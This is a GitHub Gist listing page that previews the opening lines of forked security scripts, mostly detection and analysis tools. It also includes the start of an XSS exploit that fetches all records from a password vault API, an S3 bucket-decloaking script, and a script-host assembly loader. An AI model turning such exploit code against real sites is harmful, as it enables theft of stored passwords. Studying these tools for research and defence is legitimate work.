CaledoniaProject
CaledoniaProject
/ rpm-digital-signature.sh
Created
September 5, 2018 23:23
— forked from fernandoaleman/rpm-digital-signature.sh
How to sign your custom RPM package with GPG key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # How to sign your custom RPM package with GPG key | |
| # Step: 1 | |
| # Generate gpg key pair (public key and private key) | |
| # | |
| # You will be prompted with a series of questions about encryption. | |
| # Simply select the default values presented. You will also be asked | |
| # to create a Real Name, Email Address and Comment (comment optional). | |
| # | |
| # If you get the following response: |
CaledoniaProject
/ password_vault_exploit.js
Created
August 24, 2018 01:18
— forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |
CaledoniaProject
/ EmulateProcExpDotNetEnumeration.ps1
Created
August 11, 2018 09:42
— forked from mattifestation/EmulateProcExpDotNetEnumeration.ps1
Replicates the data collected when enumerating .NET Assemblies in Process Explorer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logman start trace dotNetAssemblyTrace2 -p "Microsoft-Windows-DotNETRuntimeRundown" "LoaderRundownKeyword, StartRundownKeyword" win:Informational -o dotNetAssemblyTrace2.etl -ets | |
| Start-Sleep -Seconds 5 | |
| logman stop dotNetAssemblyTrace2 -ets | |
| $EnumeratedCLRRuntimes = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=187)]]' | |
| $EnumeratedAppDomains = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=157)]]' | |
| $EnumeratedAssemblies = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=155)]]' | |
| $EnumeratedModules = Get-WinEvent -Path .\dotNetAssemblyTrace2.etl -Oldest -FilterXPath '*[System[(EventID=153)]]' |
CaledoniaProject
/ example.cs
Created
August 10, 2018 03:12
Loads .NET Assembly into script host from current path
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
CaledoniaProject
/ cbapi-ps-lsass-loop.py
Created
August 1, 2018 11:30
— forked from curi0usJack/cbapi-ps-lsass-loop.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Carbon Black Evil PowerShell LSASS Query | |
| # | |
| # Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe | |
| # | |
| # Author: Jason Lang (@curi0usJack) | |
| # | |
| # Prereqs (Windows 10) | |
| # Install bash on Win10 | |
| # sudo apt-get install python-pip | |
| # sudo pip install --upgrade requests |
CaledoniaProject
/ djb2.go
Created
July 22, 2018 14:37
— forked from lmas/djb2.go
djb2, a non-cryptographic hash function
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package djb2 | |
| // For when you ever need to implement a dictionary hash function, | |
| // that's good enough, simple and fast. | |
| // | |
| // WARNING: | |
| // Not cryptographicly secure! | |
| // | |
| // Source: https://en.wikipedia.org/wiki/DJB2 | |
| // |
CaledoniaProject
/ GetPEFeature.ps1
Created
July 16, 2018 12:04
— forked from mattifestation/GetPEFeature.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Get-PEFeature { | |
| <# | |
| .SYNOPSIS | |
| Retrieves key features from PE files that can be used to build detections. | |
| .DESCRIPTION | |
| Get-PEFeature extracts key features of PE files that are relevant to building detections. |
CaledoniaProject
/ auto_shellcode_hashes.py
Created
July 16, 2018 10:50
— forked from williballenthin/auto_shellcode_hashes.py
automatically resolve shellcode hashes into symbolic names using emulation, example: https://asciinema.org/a/uxzaceQ20DFYLJ0APL8sDuh0U
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| import logging | |
| import pefile | |
| import ucutils | |
| import unicorn | |
| import capstone | |
| import argparse |
CaledoniaProject
/ bucket-disclose.sh
Created
July 12, 2018 09:41
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
CaledoniaProject
/ SysmonEventGUIDParser.ps1
Created
July 9, 2018 00:03
— forked from mattifestation/SysmonEventGUIDParser.ps1
Extracts fields from sysmon process and logon GUIDs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| $Epoch = Get-Date '01/01/1970' | |
| # Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/ | |
| $StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName | |
| $TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone) | |
| # Parse out all the LogonGUID fields for sysmon ProcessCreate events | |
| Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object { |